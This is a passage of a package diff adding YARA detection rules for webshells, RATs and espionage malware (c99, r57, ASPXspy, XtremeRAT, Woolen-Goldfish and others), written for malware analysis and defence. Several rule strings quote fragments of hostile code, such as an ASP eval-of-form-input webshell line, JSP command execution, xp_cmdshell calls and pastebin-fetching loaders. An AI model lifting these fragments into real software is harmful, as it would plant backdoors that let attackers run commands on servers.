+		description = "Webshells Auto-generated - file c99shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
+	strings:
+		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
+	condition:
+		all of them
+}
+rule phpspy_2005_full {
+	meta:
+		description = "Webshells Auto-generated - file phpspy_2005_full.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d1c69bb152645438440e6c903bac16b2"
+	strings:
+		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
+	condition:
+		all of them
+}
+rule FSO_s_zehir4_2 {
+	meta:
+		description = "Webshells Auto-generated - file zehir4.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+	strings:
+		$s4 = "\"Program Files\\Serv-u\\Serv"
+	condition:
+		all of them
+}
+rule httpdoor {
+	meta:
+		description = "Webshells Auto-generated - file httpdoor.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "6097ea963455a09474471a9864593dc3"
+	strings:
+		$s4 = "''''''''''''''''''DaJKHPam"
+		$s5 = "o,WideCharR]!n]"
+		$s6 = "HAutoComplete"
+		$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
+	condition:
+		all of them
+}
+rule FSO_s_indexer_2 {
+	meta:
+		description = "Webshells Auto-generated - file indexer.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "135fc50f85228691b401848caef3be9e"
+	strings:
+		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+	strings:
+		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
+		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
+		$s9 = "scrollbar-face-color:#E4E4F3;"
+	condition:
+		all of them
+}
+rule _root_040_zip_Folder_deploy {
+	meta:
+		description = "Webshells Auto-generated - file deploy.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2c9f9c58999256c73a5ebdb10a9be269"
+	strings:
+		$s5 = "halon synscan 127.0.0.1 1-65536"
+		$s8 = "Obviously you replace the ip address with that of the target."
+
+	condition:
+		all of them
+}
+rule by063cli {
+	meta:
+		description = "Webshells Auto-generated - file by063cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "49ce26eb97fd13b6d92a5e5d169db859"
+	strings:
+		$s2 = "#popmsghello,are you all right?"
+		$s4 = "connect failed,check your network and remote ip."
+	condition:
+		all of them
+}
+rule icyfox007v1_10_rar_Folder_asp {
+	meta:
+		description = "Webshells Auto-generated - file asp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2c412400b146b7b98d6e7755f7159bb9"
+	strings:
+		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
+	condition:
+		all of them
+}
+rule FSO_s_EFSO_2_2 {
+	meta:
+		description = "Webshells Auto-generated - file EFSO_2.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+	condition:
+		all of them
+}
+rule byshell063_ntboot_2 {
+	meta:
+		description = "Webshells Auto-generated - file ntboot.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
+	strings:
+		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
+	condition:
+		all of them
+}
+rule u_uay {
+	meta:
+		description = "Webshells Auto-generated - file uay.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
+	strings:
+		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
+		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
+	condition:
+		1 of them
+}
+rule bin_wuaus {
+	meta:
+		description = "Webshells Auto-generated - file wuaus.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "46a365992bec7377b48a2263c49e4e7d"
+	strings:
+		$s1 = "9(90989@9V9^9f9n9v9"
+		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
+		$s3 = ";(=@=G=O=T=X=\\="
+		$s4 = "TCP Send Error!!"
+		$s5 = "1\"1;1X1^1e1m1w1~1"
+		$s8 = "=$=)=/=<=Y=_=j=p=z="
+	condition:
+		all of them
+}
+rule pwreveal {
+	meta:
+		description = "Webshells Auto-generated - file pwreveal.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4e8447826a45b76ca45ba151a97ad50"
+	strings:
+		$s0 = "*<Blank - no es"
+		$s3 = "JDiamondCS "
+		$s8 = "sword set> [Leith=0 bytes]"
+		$s9 = "ION\\System\\Floating-"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_xwhois {
+	meta:
+		description = "Webshells Auto-generated - file xwhois.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0bc98bd576c80d921a3460f8be8816b4"
+	strings:
+		$s1 = "rting! "
+		$s2 = "aTypCog("
+		$s5 = "Diamond"
+		$s6 = "r)r=rQreryr"
+	condition:
+		all of them
+}
+rule vanquish_2 {
+	meta:
+		description = "Webshells Auto-generated - file vanquish.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2dcb9055785a2ee01567f52b5a62b071"
+	strings:
+		$s2 = "Vanquish - DLL injection failed:"
+	condition:
+		all of them
+}
+rule down_rar_Folder_down {
+	meta:
+		description = "Webshells Auto-generated - file down.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "db47d7a12b3584a2e340567178886e71"
+	strings:
+		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
+	condition:
+		all of them
+}
+rule cmdShell {
+	meta:
+		description = "Webshells Auto-generated - file cmdShell.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8a9fef43209b5d2d4b81dfbb45182036"
+	strings:
+		$s1 = "if cmdPath=\"wscriptShell\" then"
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_nc {
+	meta:
+		description = "Webshells Auto-generated - file nc.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
+	strings:
+		$s0 = "WSOCK32.dll"
+		$s1 = "?bSUNKNOWNV"
+		$s7 = "p@gram Jm6h)"
+		$s8 = "ser32.dllCONFP@"
+	condition:
+		all of them
+}
+rule portlessinst {
+	meta:
+		description = "Webshells Auto-generated - file portlessinst.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "74213856fc61475443a91cd84e2a6c2f"
+	strings:
+		$s2 = "Fail To Open Registry"
+		$s3 = "f<-WLEggDr\""
+		$s6 = "oMemoryCreateP"
+	condition:
+		all of them
+}
+rule SetupBDoor {
+	meta:
+		description = "Webshells Auto-generated - file SetupBDoor.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "41f89e20398368e742eda4a3b45716b6"
+	strings:
+		$s1 = "\\BDoor\\SetupBDoor"
+	condition:
+		all of them
+}
+rule phpshell_3 {
+	meta:
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
+	strings:
+		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
+		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
+	condition:
+		all of them
+}
+rule BIN_Server {
+	meta:
+		description = "Webshells Auto-generated - file Server.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
+	strings:
+		$s0 = "configserver"
+		$s1 = "GetLogicalDrives"
+		$s2 = "WinExec"
+		$s4 = "fxftest"
+		$s5 = "upfileok"
+		$s7 = "upfileer"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006 {
+	meta:
+		description = "Webshells Auto-generated - file 2006.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "c19d6f4e069188f19b08fa94d44bc283"
+	strings:
+		$s6 = "strBackDoor = strBackDoor "
+	condition:
+		all of them
+}
+rule r57shell_3 {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "87995a49f275b6b75abe2521e03ac2c0"
+	strings:
+		$s1 = "<b>\".$_POST['cmd']"
+	condition:
+		all of them
+}
+
+
+rule HDConfig {
+	meta:
+		description = "Webshells Auto-generated - file HDConfig.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "7d60e552fdca57642fd30462416347bd"
+	strings:
+		$s0 = "An encryption key is derived from the password hash. "
+		$s3 = "A hash object has been created. "
+		$s4 = "Error during CryptCreateHash!"
+		$s5 = "A new key container has been created."
+		$s6 = "The password has been added to the hash. "
+	condition:
+		all of them
+}
+rule FSO_s_ajan_2 {
+	meta:
+		description = "Webshells Auto-generated - file ajan.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+	strings:
+		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
+		$s3 = "/file.zip"
+	condition:
+		all of them
+}
+
+rule Webshell_and_Exploit_CN_APT_HK : Webshell
+{
+meta:
+	author = "Florian Roth"
+	description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
+	date = "10.10.2014"
+	score = 50
+strings:
+	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
+	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
+condition:
+	$a0 or ( all of ($s*) )
+}
+
+rule JSP_Browser_APT_webshell {
+	meta: 
+		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
+		author = "F.Roth"
+		date = "10.10.2014"
+		score = 60
+	strings:
+		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+	condition:
+		all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell {
+	meta: 
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 60
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+	strings:
+		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+	condition:
+		all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell_2 {
+	meta: 
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 60
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+	strings:
+		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+	condition:
+		all of ($a*) or all of ($s*)
+}
+
+rule AJAX_FileUpload_webshell {
+	meta: 
+		description = "AJAX JS/CSS components providing web shell by APT groups"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 75
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
+	strings:
+		$a1 = "var frameId = 'jUploadFrame' + id;" ascii
+		$a2 = "var form = jQuery('<form  action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
+		$a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii
+	condition:
+		all of them
+}
+
+rule Webshell_Insomnia {
+	meta:
+		description = "Insomnia Webshell - file InsomniaShell.aspx"
+		author = "Florian Roth"
+		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+		date = "2014/12/09"
+		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
+		score = 80
+	strings:
+		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+	condition:
+		3 of them
+}
+
+rule HawkEye_PHP_Panel {
+	meta:
+		description = "Detects HawkEye Keyloggers PHP Panel"
+		author = "Florian Roth"
+		date = "2014/12/14"
+		score = 60
+	strings:
+		$s0 = "$fname = $_GET['fname'];" ascii fullword
+		$s1 = "$data = $_GET['data'];" ascii fullword
+		$s2 = "unlink($fname);" ascii fullword
+		$s3 = "echo \"Success\";" fullword ascii
+	condition:
+		all of ($s*) and filesize < 600
+}
+
+rule SoakSoak_Infected_Wordpress {
+	meta:
+		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+		reference = "http://goo.gl/1GzWUX"
+		author = "Florian Roth"
+		date = "2014/12/15"
+		score = 60
+	strings:
+		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+		$s1 = "function FuncQueueObject()" ascii fullword
+		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+	condition:
+		all of ($s*)
+}
+
+
+rule Pastebin_Webshell {
+	meta:
+		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+		author = "Florian Roth"
+		score = 70
+		date = "13.01.2015"
+		reference = "http://goo.gl/7dbyZs"
+	strings:
+		$s0 = "file_get_contents(\"http://pastebin.com" ascii
+		$s1 = "xcurl('http://pastebin.com/download.php" ascii
+		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
+		
+		$x0 = "if($content){unlink('evex.php');" ascii
+		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+		
+		$y0 = "file_put_contents($pth" ascii
+		$y1 = "echo \"<login_ok>" ascii
+		$y2 = "str_replace('* @package Wordpress',$temp" ascii
+	condition:
+		1 of ($s*) or all of ($x*) or all of ($y*)
+}
+
+rule ASPXspy2 {
+	meta:
+		description = "Web shell - file ASPXspy2.aspx"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/24"
+		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
+	strings:
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+	condition:
+		6 of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Wimmie.yara remnux-rules-0.0.4/yara.old/Wimmie.yara
--- remnux-rules-0.0.3/yara.old/Wimmie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Wimmie.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WimmieShellcode : Wimmie Family 
+{
+    meta:
+        description = "Wimmie code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+        
+    strings:
+        // decryption loop
+        $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
+        $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
+        
+    condition:
+        any of them
+}
+
+rule WimmieStrings : Wimmie Family
+{
+    meta:
+        description = "Strings used by Wimmie"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+        
+    strings:
+        $ = "\x00ScriptMan"
+        $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii
+        $ = "ProbeScriptFint" wide ascii
+        $ = "ProbeScriptKids"
+        
+    condition:
+        any of them
+
+}
+
+rule Wimmie : Family
+{
+    meta:
+        description = "Wimmie family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+   
+    condition:
+        WimmieShellcode or WimmieStrings
+        
+}
diff -Nru remnux-rules-0.0.3/yara.old/WoolenGoldfish.yara remnux-rules-0.0.4/yara.old/WoolenGoldfish.yara
--- remnux-rules-0.0.3/yara.old/WoolenGoldfish.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/WoolenGoldfish.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,99 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule WoolenGoldfish_Sample_1 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 60
+		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
+	strings:
+		$s1 = "Cannot execute (%d)" fullword ascii
+		$s16 = "SvcName" fullword ascii
+	condition:
+		all of them
+}
+
+rule WoolenGoldfish_Generic_1 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		super_rule = 1
+		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
+		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
+	strings:
+		$x0 = "Users\\Wool3n.H4t\\"
+		$x1 = "C-CPP\\CWoolger"
+		$x2 = "NTSuser.exe" fullword wide
+
+		$s1 = "107.6.181.116" fullword wide
+		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+		$s6 = "wlg.dat" fullword
+		$s7 = "woolger" fullword wide
+		$s8 = "[Enter]" fullword
+		$s9 = "[Control]" fullword
+	condition:
+		( 1 of ($x*) and 2 of ($s*) ) or
+		( 6 of ($s*) )
+}
+
+rule WoolenGoldfish_Generic_2 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
+	strings:
+		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+	condition:
+		all of them
+}
+
+rule WoolenGoldfish_Generic_3 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
+		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
+	strings:
+		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
+		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
+		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
+
+		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
+		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
+		$s4 = "unable to load kernel32.dll" fullword ascii
+		$s5 = "index.php?c=%S&r=%x" fullword wide
+		$s6 = "%s len:%d " fullword ascii
+		$s7 = "Encountered error sending syscall response to client" fullword ascii
+		$s9 = "/info.dat" fullword ascii
+		$s10 = "Error entering thread lock" fullword ascii
+		$s11 = "Error exiting thread lock" fullword ascii
+		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
+	condition:
+		( 1 of ($x*) ) or
+		( 8 of ($s*) )
+}
diff -Nru remnux-rules-0.0.3/yara.old/Xtreme.yara remnux-rules-0.0.4/yara.old/Xtreme.yara
--- remnux-rules-0.0.3/yara.old/Xtreme.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Xtreme.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,112 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Xtreme
+{
+    meta:
+        description = "Xtreme RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /(X)tremeKeylogger/ wide ascii
+        $string2 = /(X)tremeRAT/ wide ascii
+        $string3 = /(X)TREMEUPDATE/ wide ascii
+        $string4 = /(S)TUBXTREMEINJECTED/ wide ascii
+
+        $unit1 = /(U)nitConfigs/ wide ascii
+        $unit2 = /(U)nitGetServer/ wide ascii
+        $unit3 = /(U)nitKeylogger/ wide ascii
+        $unit4 = /(U)nitCryptString/ wide ascii
+        $unit5 = /(U)nitInstallServer/ wide ascii
+        $unit6 = /(U)nitInjectServer/ wide ascii
+        $unit7 = /(U)nitBinder/ wide ascii
+        $unit8 = /(U)nitInjectProcess/ wide ascii
+
+    condition:
+        5 of them
+}
+
+rule xtreme_rat : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="23/02/2013"
+		description="Xtreme RAT"
+	
+	strings:
+		$signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/
+		
+	condition:
+		$signature1
+}
+
+rule XtremeRATCode : XtremeRAT Family 
+{
+    meta:
+        description = "XtremeRAT code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+    
+    strings:
+        // call; fstp st
+        $ = { E8 ?? ?? ?? ?? DD D8 }
+        // hiding string
+        $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
+    
+    condition:
+        all of them
+}
+
+rule XtremeRATStrings : XtremeRAT Family
+{
+    meta:
+        description = "XtremeRAT Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    strings:
+        $ = "dqsaazere"
+        $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
+        
+    condition:
+       any of them
+}
+
+rule XtremeRAT : Family
+{
+    meta:
+        description = "XtremeRAT"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    condition:
+        XtremeRATCode or XtremeRATStrings
+}
+
+rule xtremrat : rat
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Xtrem RAT v3.5"
+		date = "2012-07-12" 
+		version = "1.0" 
+		filetype = "memory"
+
+	strings:
+		$a = "XTREME" wide
+		$b = "XTREMEBINDER" wide
+		$c = "STARTSERVERBUFFER" wide
+		$d = "SOFTWARE\\XtremeRAT" wide
+		$e = "XTREMEUPDATE" wide
+		$f = "XtremeKeylogger" wide
+		$g = "myversion|3.5" wide
+		$h = "xtreme rat" wide nocase
+	condition:
+		2 of them
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/YahLover.yara remnux-rules-0.0.4/yara.old/YahLover.yara
--- remnux-rules-0.0.3/yara.old/YahLover.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/YahLover.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YahLover : Worm
+{
+	meta:
+		author="Kevin Falcoz"
+		date="10/06/2013"
+		description="YahLover"
+		
+	strings:
+		$signature1={42 00 49 00 54 00 52 00 4F 00 54 00 41 00 54 00 45 00 00 00 42 00 49 00 54 00 53 00 48 00 49 00 46 00 54 00 00 00 00 00 42 00 49 00 54 00 58 00 4F 00 52}
+		
+	condition:
+		$signature1
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Yayih.yara remnux-rules-0.0.4/yara.old/Yayih.yara
--- remnux-rules-0.0.3/yara.old/Yayih.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Yayih.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YayihCode : Yayih Family 
+{
+    meta:
+        description = "Yayih code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+    
+    strings:
+        //  encryption
+        $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
+    
+    condition:
+        any of them
+}
+
+rule YayihStrings : Yayih Family
+{
+    meta:
+        description = "Yayih Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+        
+    strings:
+        $ = "/bbs/info.asp"
+        $ = "\\msinfo.exe"
+        $ = "%s\\%srcs.pdf"
+        $ = "\\aumLib.ini"
+
+    condition:
+       any of them
+}
+
+rule Yayih : Family
+{
+    meta:
+        description = "Yayih"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+        
+    condition:
+        YayihCode or YayihStrings
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Zegost.yara remnux-rules-0.0.4/yara.old/Zegost.yara
--- remnux-rules-0.0.3/yara.old/Zegost.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Zegost.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Zegost : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
